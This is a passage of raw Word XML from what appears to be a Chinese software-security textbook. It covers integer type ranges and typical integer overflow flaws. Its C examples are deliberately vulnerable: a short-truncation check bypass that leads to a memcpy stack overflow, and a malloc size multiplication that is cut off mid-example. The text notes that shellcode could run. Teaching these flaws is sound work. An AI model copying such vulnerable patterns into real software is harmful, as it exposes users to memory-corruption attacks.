                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2147483647</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="4EA7CBE2" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="200A85C8"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4EBB1230"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unsigned _int64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79B58EA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无符号6</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>位整数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="452FA1D8"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F60C664"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sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>18446744073709551615</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="5D4E3018" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="164589FA"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04CAEC61"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_</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>int64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77DAED52"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6</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>位整数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24CF69D0"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9223372036854775808</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441B1054"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sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9223372036854775807</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="7B715FB0" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1B97F0CC"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VS2012 C#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EFD810D"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ushort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E4C9960"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无符号短整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA4E6EB"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="303BA68E"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6</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>5535</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="2D0AD975" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="4770D56E"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4EB8A56B"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short</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CAEC627"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短整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F47632"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>32768</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7867468F"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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="52807566" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="14451A93"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3A192E4D"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uint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="731222F3"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无符号整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D3C276"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD7D7D8"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hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>294967295</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="0CC4670E" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2524B4AE"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0C343CE6"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i</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>nt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B10F42F"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整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6474847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w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2147483648</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="650BB24F"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sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2147483647</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="443DD1D0" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="65B23C35"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01BC98F8"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u</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B452228"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无符号长整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="663C3DFC"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3022DB24" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="400"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>18446744073709551615</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="4C791C3A" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="12A6FB52" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B043BB4"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l</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7323BC"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长整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="482EB7BE"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hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9223372036854775808</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434BC2B3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9223372036854775807</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D3CB6AF"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.4.3 整数溢出典型问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D393AB3"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接下来以3个示例代码分析整数溢出的典型问题，分别是整数宽度溢出、整数运算溢出、整数符号溢出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178DF125" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>整数宽度溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68E5B1"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42409B8E"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void main(int argc,char* argv[]) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439C71C6"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63C594F1"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unsigned short s; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFBD7D"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int i; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61453961"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char buf[80]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B71754"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i = atoi(argv[1]); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0606CA3C"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s = i; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8915AB"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if(s &gt;= 80) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1131F7" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="400" w:firstLine="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">return; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B69955"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memcpy(buf,argv[2],i); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05255276"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03D920A8"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观察以上代码，函数从外部获得参数argv</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并通过atoi函数将字符串转为int类型变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并将i的值赋给unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short类型的变量s。由于buf数组的长度为8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节，所以函数做了判断，若s≥8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，函数直接返回，否则将argv</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符串通过memcpy复制到buf中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC691D1"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以上代码看似对将要内存复制的数据长度进行了判断，避免了由于复制数据大于缓冲区而导致栈缓冲区溢出的情况。但unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short为2字节长度，而int为4字节长度，若int类型的值i大于unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short类型的值s所表示的最大值，将发生截断。例如，s能表示的最大的整数为0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>ffff=65535</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，若i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>=65536</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即0x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>10000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，由于超出s的长度，将取i的最低2字节为s的值，即为0。显然，s=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会进入if判断，则程序执行m</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>emcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数时，将从argv</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>5536</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节的数据到buf中，将会导致栈溢出，若a</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>rgv[2]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中存在Shellcode，则程序将执行恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4CF06" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E16F9B0"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2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>整数运算溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1275ACFB"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代码2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779DD12"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void CopyIntArray(int *array,int len) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2922C4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E2989F"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int *myarray; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105DF4E"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int i; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6954A17A"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myarray = malloc(len*sizeof(int)); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3C5F8"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if(myarray == NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678EB693" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="400" w:firstLine="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">return; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF0C6D"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for(i=0;i&lt;len;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8CA870" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:ind w:firstLineChars="400" w:firstLine="840"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
